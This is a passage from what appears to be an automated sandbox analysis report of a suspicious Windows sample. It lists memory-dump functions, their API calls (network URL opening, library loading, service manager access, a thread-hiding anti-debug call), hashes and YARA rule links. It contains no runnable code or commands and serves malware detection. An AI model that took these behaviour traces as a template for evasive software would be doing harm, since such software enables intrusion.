Opcode Fuzzy Hash: 23c22a612b3808046ca6c1888ad98af41b44e57f1ba2709be54cd60845dbc94c
Instruction Fuzzy Hash: 433145B11093D68BCB229F3089693DB7FA1BF86300F7494C9C8810F257C6714A01DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 005637FA, Relevance: 1.6, APIs: 1, Instructions: 87networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563881

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 3495a48d8ba24681b936087f26c5b8e03dabd9224234b2bbf0e8a386bb02e793
Instruction ID: 1956e9f654024cd77dbb7e6e1331233d106d1cbf56dd498bb64e7c6fc2ca649c
Opcode Fuzzy Hash: 3495a48d8ba24681b936087f26c5b8e03dabd9224234b2bbf0e8a386bb02e793
Instruction Fuzzy Hash: B331F770148386EBEB324F24CD65BEB3F64EF05300F6480A6EE899B593D2724A41EB11

Uniqueness

Uniqueness Score: -1.00%

Function 00564B3F, Relevance: 1.6, APIs: 1, Instructions: 84libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: be1e48653ddaf708786892438fcfab6d8d23c2981758e7cb4cb4f5105689a2df
Instruction ID: cffa1fd815da82151573961501234f2f2887e32722c7fe2b03d7e69b7fb730b4
Opcode Fuzzy Hash: be1e48653ddaf708786892438fcfab6d8d23c2981758e7cb4cb4f5105689a2df
Instruction Fuzzy Hash: 232143D008DA91E3EB422A38D5F43FF6F557E89724FF4B8D2DE814BA03965204409EA3

Uniqueness

Uniqueness Score: -1.00%

Function 00563711, Relevance: 1.6, APIs: 1, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00564B9E: LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

Part of subcall function 005637E3: InternetOpenA.WININET(00563E63,00000000,00000000,00000000,00000000,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 005637F2
Part of subcall function 005637E3: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563881

LdrInitializeThunk.NTDLL(?,?,?,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 00563EC8

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InternetOpen$InitializeLibraryLoadThunk
String ID:
API String ID: 1998099105-0
Opcode ID: 340db1f46c6e31b150487d9add0d053ab13a121f2fa65b6c95d9b1f55b65faef
Instruction ID: a11306afb331a57dc00adf508a5dadd3023c7d5e55cd800909b25f81e556cf83
Opcode Fuzzy Hash: 340db1f46c6e31b150487d9add0d053ab13a121f2fa65b6c95d9b1f55b65faef
Instruction Fuzzy Hash: 332105B11097D59BD7229F3489B93DB7FA1BF86350F78A4C9C8C10B257C6724A02D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00566DEA, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,000000C0,?,?,-00000001,?,0056029F,00000000), ref: 00566F91

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 8a765dbbaab017909cd32112c94f38ef2fa744cc9977ad3dd824b76947d5569b
Instruction ID: 0681251305cfe485f1bbc475264cc121b1726c3dd5d54fe097995ee80bc2a190
Opcode Fuzzy Hash: 8a765dbbaab017909cd32112c94f38ef2fa744cc9977ad3dd824b76947d5569b
Instruction Fuzzy Hash: 1621D46020D50ADEEB158B24C5783AE7FA1FB4E3B8FA861D5C9414B192D37148C0CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0056374A, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00564B9E: LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

Part of subcall function 005637E3: InternetOpenA.WININET(00563E63,00000000,00000000,00000000,00000000,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 005637F2
Part of subcall function 005637E3: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563881

LdrInitializeThunk.NTDLL(?,?,?,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 00563EC8

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InternetOpen$InitializeLibraryLoadThunk
String ID:
API String ID: 1998099105-0
Opcode ID: 971d2cc3d171d21add272548c90d7acf106289a938312e5d561427bc86fd9cab
Instruction ID: 2cae9c63abfebb0648de921aa29246e10feb3985b8f765d97e566fe36ad01640
Opcode Fuzzy Hash: 971d2cc3d171d21add272548c90d7acf106289a938312e5d561427bc86fd9cab
Instruction Fuzzy Hash: EB2137B11097D59BD7229F3489A93DB7FA1BF87350F6894CDC8C10B267C6724A01D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00566E2A, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,000000C0,?,?,-00000001,?,0056029F,00000000), ref: 00566F91

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: f414bdfe74ebaabd1ff8300895cb420ce583b01220aaf0235e54773e6be44e00
Instruction ID: 90d1eb54cfd57e4da80ec8dd51aebd0b432fd6fa274ffaba51c93459b2c1aed1
Opcode Fuzzy Hash: f414bdfe74ebaabd1ff8300895cb420ce583b01220aaf0235e54773e6be44e00
Instruction Fuzzy Hash: C811D36020D90A8FE7558B24C17C3AA7FA1FB4E3B8FA8A1D5C9414B566D33248C1CAE1

Uniqueness

Uniqueness Score: -1.00%

Function 00563DC1, Relevance: 1.6, APIs: 1, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(?,?,?,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 00563EC8

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ad6d28f0af73e17bf2bcc4784c0e025a17569954c210d446efa51dcf813910e4
Instruction ID: 1941c7cc2da226cbc2545b8cca9233a4a7cad87630cd5c745058b9ffab0a0c10
Opcode Fuzzy Hash: ad6d28f0af73e17bf2bcc4784c0e025a17569954c210d446efa51dcf813910e4
Instruction Fuzzy Hash: 4611E6B115E7D1A7CB235B3449BA2D3BFA5AD87320BB8A0CDC8C14B563C6524A11D7E2

Uniqueness

Uniqueness Score: -1.00%

Function 00563DF1, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(?,?,?,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 00563EC8

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8468c81dc9f9803c515152f14623cfa2e8c5c1328662c521b9cc4ac5db8fc3e1
Instruction ID: 7f11c11467304a64d062c752c8dc9348b0f0604b5bed1dfca7ab41c348df1aa9
Opcode Fuzzy Hash: 8468c81dc9f9803c515152f14623cfa2e8c5c1328662c521b9cc4ac5db8fc3e1
Instruction Fuzzy Hash: 111108B101E7D1A7C7235B3485BA183BFA5AD87320BB8E0CDC8C10A563C5634A01D7E2

Uniqueness

Uniqueness Score: -1.00%

Function 00566E6D, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,000000C0,?,?,-00000001,?,0056029F,00000000), ref: 00566F91

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 1ff12657f25b14f4ec8fdbd2c6cbed48df108c153d7f90e208ac72b13189be58
Instruction ID: d1780569d85af630a6b13e421cae35c764898bf8c6ebb0ad176f704a126823a1
Opcode Fuzzy Hash: 1ff12657f25b14f4ec8fdbd2c6cbed48df108c153d7f90e208ac72b13189be58
Instruction Fuzzy Hash: FC11066020D50ECEEB158B34D1783AA7FA1FB4E3B8FA861D5C9804B126D33244C1CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00564BA3, Relevance: 1.6, APIs: 1, Instructions: 60libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3115351024096f9bec351d3aa4c992a970be442d5c6c598a20925abd319a8044
Instruction ID: 9cb9ffb361eae4b7e2583e372961b8fb3dfaec57bb4e169f153360a35720280d
Opcode Fuzzy Hash: 3115351024096f9bec351d3aa4c992a970be442d5c6c598a20925abd319a8044
Instruction Fuzzy Hash: 80018990A89651D3EF112A3485F03FF5F15BF85764FB0A8E2EEC14B602974148845D53

Uniqueness

Uniqueness Score: -1.00%

Function 00564C54, Relevance: 1.6, APIs: 1, Instructions: 59libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 711185282b99b828ea6464f08b33274a5e104e9384294c5e906b6972ce4cbe1e
Instruction ID: 7028bb61280ce14a46125909eb321d54b3b7b8b5730b84d7bc5ea7cb75d573f0
Opcode Fuzzy Hash: 711185282b99b828ea6464f08b33274a5e104e9384294c5e906b6972ce4cbe1e
Instruction Fuzzy Hash: 0D0190D0ACD551D3EB11363485B53FF5E55BE94710FB4A896E9C14B303D6514C409E93

Uniqueness

Uniqueness Score: -1.00%

Function 00564BCF, Relevance: 1.6, APIs: 1, Instructions: 59libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9066243268aa27e22cffcd66f17b0b9ebf4344cd0105caee33734be97abd7993
Instruction ID: c678adcc48e0f1502daa452ba475a4d1d73794fb717b266bba19f5790f570c6c
Opcode Fuzzy Hash: 9066243268aa27e22cffcd66f17b0b9ebf4344cd0105caee33734be97abd7993
Instruction Fuzzy Hash: 6A0168D0A89A51A3FB112934C9F43FF5E55BF84724FB4A8A2EEC18B602965248845D93

Uniqueness

Uniqueness Score: -1.00%

Function 005627CF, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6b0de34833b6c96a93205298cf7869fb56169ab73acd43029a11eb5906c49a0
Instruction ID: ac93c24ac578d18a5dac4de58b7cc4e2a1672d64c88ecca93de63aa1d80185f4
Opcode Fuzzy Hash: f6b0de34833b6c96a93205298cf7869fb56169ab73acd43029a11eb5906c49a0
Instruction Fuzzy Hash: 18017664A89602A2FF203A108994BBE0D18FF91754FB08D27B9938B24197848CC52E13

Uniqueness

Uniqueness Score: -1.00%

Function 00564C07, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: beac90458a0e9b80c92c1c64f728bfc2d66abb21046eed59fe230d084d163d7e
Instruction ID: a35f998e83f2ba38b096aa9fc2781dda1f459da345f9fde29ebf7706f0791508
Opcode Fuzzy Hash: beac90458a0e9b80c92c1c64f728bfc2d66abb21046eed59fe230d084d163d7e
Instruction Fuzzy Hash: 220147D4689A51E3EB113A3485F43FF6F55BE88724FF4A8D2EE818F303965248845E93

Uniqueness

Uniqueness Score: -1.00%

Function 00566ED1, Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,000000C0,?,?,-00000001,?,0056029F,00000000), ref: 00566F91

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: a87fb4ccd201c19f07a7f595ca6e9a07b529f28a6fc946b4831ce5dc2a3c642f
Instruction ID: db722c3292950a30e8d1c471f5e2200bf5188fa6270e68cc742fb4d95e843681
Opcode Fuzzy Hash: a87fb4ccd201c19f07a7f595ca6e9a07b529f28a6fc946b4831ce5dc2a3c642f
Instruction Fuzzy Hash: C70149D020C9159B73475A38D5B82EF7FA2EC8E3B47F8A1C4CE404B617A123008086E1

Uniqueness

Uniqueness Score: -1.00%

Function 005637C5, Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 005637E3: InternetOpenA.WININET(00563E63,00000000,00000000,00000000,00000000,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 005637F2
Part of subcall function 005637E3: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563881

LdrInitializeThunk.NTDLL(?,?,?,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 00563EC8

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InternetOpen$InitializeThunk
String ID:
API String ID: 518753361-0
Opcode ID: 9b3735874e9cb7bec3daea5aefdb89bc2783ff5a4e5e0f7cb8f6136da55e34b3
Instruction ID: 0d9f4df22ddeca4f7a25ad8cac898b9224543f500f686ae555938962323904de
Opcode Fuzzy Hash: 9b3735874e9cb7bec3daea5aefdb89bc2783ff5a4e5e0f7cb8f6136da55e34b3
Instruction Fuzzy Hash: FF016D7250E7C549C7229B30466A283BFB0BF83210B1C80CDC4C10A163C6625F46D7D6

Uniqueness

Uniqueness Score: -1.00%

Function 00563DBF, Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(?,?,?,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 00563EC8

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 923a844e70a64b4782be6acd6e4e2120e9395c19277f78e0d657df635b58df9a
Instruction ID: d4674c06e048a93d277a2d9e7fa39e6a77aeb27a019511b5348b46305ddab7ac
Opcode Fuzzy Hash: 923a844e70a64b4782be6acd6e4e2120e9395c19277f78e0d657df635b58df9a
Instruction Fuzzy Hash: F1012D7155E3D1A9CB229B30495A2937FF4BE5331076C84CEC8C20A163C7624A15D7E7

Uniqueness

Uniqueness Score: -1.00%

Function 00564B9E, Relevance: 1.5, APIs: 1, Instructions: 47libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 818c029fcc486f25d606c8eea860963afccc56dfc1a8939389680c6b99461dcd
Instruction ID: 40e37a7a8d85ce5936049abd75b9dbae069d179699bcc3acbc6ff774fbffa220
Opcode Fuzzy Hash: 818c029fcc486f25d606c8eea860963afccc56dfc1a8939389680c6b99461dcd
Instruction Fuzzy Hash: 1BF04C50EC9605D7FF207A109994BBE0D18BF91B54F704D17F9938B100D7948CC86D53

Uniqueness

Uniqueness Score: -1.00%

Function 00564C83, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 164910e17dd5c62fcfae1cb1d8e39a15e2a38bedef3c1e76ec29fe6fbe72cf27
Instruction ID: 5ab7d82b3255242bf281e9e0acff160af06dad452a39ba20a6380160b409d151
Opcode Fuzzy Hash: 164910e17dd5c62fcfae1cb1d8e39a15e2a38bedef3c1e76ec29fe6fbe72cf27
Instruction Fuzzy Hash: 53F08BA444D552E37746693484B00FF6FA17C4A7207F4B4E1CC814F713D25304009FE2

Uniqueness

Uniqueness Score: -1.00%

Function 00564CB4, Relevance: 1.5, APIs: 1, Instructions: 42libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b5627a8facb7dcf8ebf076da21102faa90a70da1a6aec270c43eaaab3243e791
Instruction ID: 53c666a05fcb6d99766ac3a4602c4794a64e358015c12f16998a5259d1495249
Opcode Fuzzy Hash: b5627a8facb7dcf8ebf076da21102faa90a70da1a6aec270c43eaaab3243e791
Instruction Fuzzy Hash: 9AF0E9E408C562E317422938D5B51EFEFA96C89B24BF4B4D0DD814F613DA6345009FE2

Uniqueness

Uniqueness Score: -1.00%

Function 00566F1F, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,000000C0,?,?,-00000001,?,0056029F,00000000), ref: 00566F91

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: ad589dfd487e78d8cc66aca4e5ad6345dfec8ddbd34dc20f55fa29a502196f0b
Instruction ID: a728f3aea3b7bf13ee49d070b1876bb709b65088666288e23fa482a83b5e3a24
Opcode Fuzzy Hash: ad589dfd487e78d8cc66aca4e5ad6345dfec8ddbd34dc20f55fa29a502196f0b
Instruction Fuzzy Hash: 79F0E9D110C5549B778B4938D6F52EF7FA69CCD3B47F4A1D4CE414760BA423014095E1

Uniqueness

Uniqueness Score: -1.00%

Function 00563637, Relevance: 1.5, APIs: 1, Instructions: 33librarynativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005606CE
LdrInitializeThunk.NTDLL(?,?,?,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 00563EC8

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationInitializeThreadThunk
String ID:
API String ID: 1629277043-0
Opcode ID: 1f08d01dd60f0a53a7ca96e9443dd0ba6e1827fa3d00b672c0916397030f865a
Instruction ID: f928fef2d98e4f07f22b40496e0d69d0ac8ab85346f8c05df0ddfe421711ef4c
Opcode Fuzzy Hash: 1f08d01dd60f0a53a7ca96e9443dd0ba6e1827fa3d00b672c0916397030f865a
Instruction Fuzzy Hash: E4F027B10885C1A7D343363482F61977FA999CA330BF8F0C1CD810B767D8120B02ABE1

Uniqueness

Uniqueness Score: -1.00%

Function 00564CF3, Relevance: 1.5, APIs: 1, Instructions: 32libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0f25faa652899e3e44554cba402c4ca323f82642b9ccc4317f478921cfc265b9
Instruction ID: fa9cf962b806178378b170dd77bcf088b0fa8558bd7c7b58681982e5193de588
Opcode Fuzzy Hash: 0f25faa652899e3e44554cba402c4ca323f82642b9ccc4317f478921cfc265b9
Instruction Fuzzy Hash: 44E022A408C561E327421A3884B41EFAFA62C4CB20BF4B4E0CD818F603D66242009FC2

Uniqueness

Uniqueness Score: -1.00%

Function 00566F67, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,000000C0,?,?,-00000001,?,0056029F,00000000), ref: 00566F91

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: a13c87acd4a4420ed36e36284cda6b4c7fd5650ea9ee443c8a91eba4896c4e21
Instruction ID: 987d104f4ab78445b746d70fd43fbf67f6c25edace67ef4ed1d6b86c013c9669
Opcode Fuzzy Hash: a13c87acd4a4420ed36e36284cda6b4c7fd5650ea9ee443c8a91eba4896c4e21
Instruction Fuzzy Hash: 47E092E0058A50AB6A4B5938D5F92DFAFA69C89374BB4B1D4CD8147A0A9423000095E2

Uniqueness

Uniqueness Score: -1.00%

Function 00563449, Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(005606D5,80000000,00000001,00000000,00000003,00000000,00000000,005633C1,0056346D,005606D5,?,?,?,?,?,005601CB), ref: 0056345F

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d211a9e5d5766e1c77ff94a03432e0cfd429752ec6106088f0ea14d9bd7fdb7f
Instruction ID: 5da2dba4a80b78f9ef2aa84a72b9e680f8822d2daff962b7664fa7add2c219bd
Opcode Fuzzy Hash: d211a9e5d5766e1c77ff94a03432e0cfd429752ec6106088f0ea14d9bd7fdb7f
Instruction Fuzzy Hash: D5C092717E0304F6FA348A209E6BFCAA2199B90F00F20850CBF093D0C196F2AA10C628

Uniqueness

Uniqueness Score: -1.00%

Function 00565024, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00561F57,00000000,?,?,00000014,?,?,00000014), ref: 00565027

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 13d4e2c602cb5e94a198cffd6b597f27ee64a479bba3d93382ac3b07f0826427
Instruction ID: 421c73394b110918804855e791171d5a20d872a0c2c7462fe2b9ef28cf769954
Opcode Fuzzy Hash: 13d4e2c602cb5e94a198cffd6b597f27ee64a479bba3d93382ac3b07f0826427
Instruction Fuzzy Hash: 89C0483144410ABB8F015F50DA0CA8E3F26BF08391F108840BE2689020DA32C568AB61

Uniqueness

Uniqueness Score: -1.00%

Function 005622F3, Relevance: 1.3, APIs: 1, Instructions: 70sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_00007071,00000000,00000000,00000000), ref: 0056239E

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c082a96c0be04e0ce120232ba3cea6f1ea21d1de127866ea3367ce1e936c9d52
Instruction ID: c2c49c0f6411de96aa59f2308e434a6c80397ad333ed0d2d2784bfdbd42a7c8e
Opcode Fuzzy Hash: c082a96c0be04e0ce120232ba3cea6f1ea21d1de127866ea3367ce1e936c9d52
Instruction Fuzzy Hash: 0C110A70244B41E7FB111A34CDAEBDA7E62BF45710FB455D1EA804F1D397718940C611

Uniqueness

Uniqueness Score: -1.00%

Function 00562351, Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_00007071,00000000,00000000,00000000), ref: 0056239E

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3b7669982473df5b03a72378b2e859666a6577b0466be150bf89b689967f17ae
Instruction ID: b5fddba779caa4d80fc986bea6abc1857399e046a3ecaa3bfc9015331a4c931f
Opcode Fuzzy Hash: 3b7669982473df5b03a72378b2e859666a6577b0466be150bf89b689967f17ae
Instruction Fuzzy Hash: 700126B0248B41DBEB552B30C9EDBDA7FA2AF89361FB494C1EA414B1939B718940C661

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 005661C4, Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 2a141e30069fa987b072877302b8ad48c575e209f861862ea15e61d55e0d728c
Instruction ID: 3e87180773c4b31e81e917efe0fea583f39b2d8b809959350e7123b933a5409f
Opcode Fuzzy Hash: 2a141e30069fa987b072877302b8ad48c575e209f861862ea15e61d55e0d728c
Instruction Fuzzy Hash: 08816470A08342CEDF25CF28D5D4B25BFD1BF56324F58869AD9964F2E6C7308442C726

Uniqueness

Uniqueness Score: -1.00%

Function 005661D3, Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 4e6a253bf08dbaa5545014377fcbbc535588d467cfef312beabf0d07a7b20690
Instruction ID: f2669982ec100dbe4b66143cf72a205d23160469a5e6a45b6deb4df1e4c9891f
Opcode Fuzzy Hash: 4e6a253bf08dbaa5545014377fcbbc535588d467cfef312beabf0d07a7b20690
Instruction Fuzzy Hash: 925170B0508382CFCB25CF28D594B66BFD1BF56324F5886AAD9964F2E7C7318442C722

Uniqueness

Uniqueness Score: -1.00%

Function 00566207, Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 943603b820f67ce03e7bbc6f08158a2e5130e42e3f3c70eb58fbed280f847946
